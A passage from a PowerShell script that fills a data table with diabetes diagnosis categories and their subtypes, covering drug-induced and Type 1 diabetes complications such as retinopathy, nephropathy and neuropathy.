mellitus with hyperosmolarity","Drug or chemical induced diabetes mellitus with hyperosmolarity with coma") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with ketoacidosis","Drug or chemical induced diabetes mellitus with ketoacidosis without coma") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with ketoacidosis","Drug or chemical induced diabetes mellitus with ketoacidosis with coma") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with kidney complications","Drug or chemical induced diabetes mellitus with diabetic nephropathy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with kidney complications","Drug or chemical induced diabetes mellitus with diabetic chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with kidney complications","Drug or chemical induced diabetes mellitus with other diabetic kidney complication") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with unspecified diabetic retinopathy","Drug or chemical induced diabetes mellitus with unspecified diabetic retinopathy with macular edema") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with unspecified diabetic retinopathy","Drug or chemical induced diabetes mellitus with unspecified diabetic retinopathy without macular edema") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy","Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy","Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy","Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy","Drug or chemical induced diabetes mellitus with stable proliferative diabetic retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema","Drug or chemical induced diabetes mellitus with proliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic cataract","Drug or chemical induced diabetes mellitus with diabetic cataract") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment","Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment, right eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment","Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment, left eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment","Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment, bilateral") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment","Drug or chemical induced diabetes mellitus with diabetic macular edema, resolved following treatment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with other diabetic ophthalmic complication","Drug or chemical induced diabetes mellitus with other diabetic ophthalmic complication") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with neurological complications","Drug or chemical induced diabetes mellitus with neurological complications with diabetic neuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with neurological complications","Drug or chemical induced diabetes mellitus with neurological complications with diabetic mononeuropathy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with neurological complications","Drug or chemical induced diabetes mellitus with neurological complications with diabetic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with neurological complications","Drug or chemical induced diabetes mellitus with neurological complications with diabetic autonomic (poly)neuropathy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with neurological complications","Drug or chemical induced diabetes mellitus with neurological complications with diabetic amyotrophy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with neurological complications","Drug or chemical induced diabetes mellitus with neurological complications with other diabetic neurological complication") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with circulatory complications","Drug or chemical induced diabetes mellitus with diabetic peripheral angiopathy without gangrene") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with circulatory complications","Drug or chemical induced diabetes mellitus with diabetic peripheral angiopathy with gangrene") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with circulatory complications","Drug or chemical induced diabetes mellitus with other circulatory complications") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic arthropathy","Drug or chemical induced diabetes mellitus with diabetic neuropathic arthropathy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with diabetic arthropathy","Drug or chemical induced diabetes mellitus with other diabetic arthropathy") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with skin complications","Drug or chemical induced diabetes mellitus with diabetic dermatitis") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with skin complications","Drug or chemical induced diabetes mellitus with foot ulcer") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with skin complications","Drug or chemical induced diabetes mellitus with other skin ulcer") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with skin complications","Drug or chemical induced diabetes mellitus with other skin complications") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with oral complications","Drug or chemical induced diabetes mellitus with periodontal disease") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with oral complications","Drug or chemical induced diabetes mellitus with other oral complications") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with hypoglycemia","Drug or chemical induced diabetes mellitus with hypoglycemia with coma") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with hypoglycemia","Drug or chemical induced diabetes mellitus with hypoglycemia without coma") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with hyperglycemia","Drug or chemical induced diabetes mellitus with hyperglycemia") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with other specified complication","Drug or chemical induced diabetes mellitus with other specified complication") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus with unspecified complications","Drug or chemical induced diabetes mellitus with unspecified complications") + $null = $DiagnosisList.Rows.Add("Drug or chemical induced diabetes mellitus without complications","Drug or chemical induced diabetes mellitus without complications") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with ketoacidosis","Type 1 diabetes mellitus with ketoacidosis without coma") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with ketoacidosis","Type 1 diabetes mellitus with ketoacidosis with coma") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with kidney complications","Type 1 diabetes mellitus with diabetic nephropathy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with kidney complications","Type 1 diabetes mellitus with diabetic chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with kidney complications","Type 1 diabetes mellitus with other diabetic kidney complication") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with unspecified diabetic retinopathy","Type 1 diabetes mellitus with unspecified diabetic retinopathy with macular edema") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with unspecified diabetic retinopathy","Type 1 diabetes mellitus with unspecified diabetic retinopathy without macular edema") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 1 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 1 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with stable proliferative diabetic retinopathy","Type 1 diabetes mellitus with stable proliferative diabetic retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with stable proliferative diabetic retinopathy","Type 1 diabetes mellitus with stable proliferative diabetic retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with stable proliferative diabetic retinopathy","Type 1 diabetes mellitus with stable proliferative diabetic retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with stable proliferative diabetic retinopathy","Type 1 diabetes mellitus with stable proliferative diabetic retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 1 diabetes mellitus with proliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic cataract","Type 1 diabetes mellitus with diabetic cataract") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment, right eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment, left eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment, bilateral") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 1 diabetes mellitus with diabetic macular edema, resolved following treatment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with other diabetic ophthalmic complication","Type 1 diabetes mellitus with other diabetic ophthalmic complication") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with neurological complications","Type 1 diabetes mellitus with diabetic neuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with neurological complications","Type 1 diabetes mellitus with diabetic mononeuropathy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with neurological complications","Type 1 diabetes mellitus with diabetic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with neurological complications","Type 1 diabetes mellitus with diabetic autonomic (poly)neuropathy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with neurological complications","Type 1 diabetes mellitus with diabetic amyotrophy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with neurological complications","Type 1 diabetes mellitus with other diabetic neurological complication") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with circulatory complications","Type 1 diabetes mellitus with diabetic peripheral angiopathy without gangrene") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with circulatory complications","Type 1 diabetes mellitus with diabetic peripheral angiopathy with gangrene") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with circulatory complications","Type 1 diabetes mellitus with other circulatory complications") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic arthropathy","Type 1 diabetes mellitus with diabetic neuropathic arthropathy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with diabetic arthropathy","Type 1 diabetes mellitus with other diabetic arthropathy") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with skin complications","Type 1 diabetes mellitus with diabetic dermatitis") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with skin complications","Type 1 diabetes mellitus with foot ulcer") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with skin complications","Type 1 diabetes mellitus with other skin ulcer") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with skin complications","Type 1 diabetes mellitus with other skin complications") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with oral complications","Type 1 diabetes mellitus 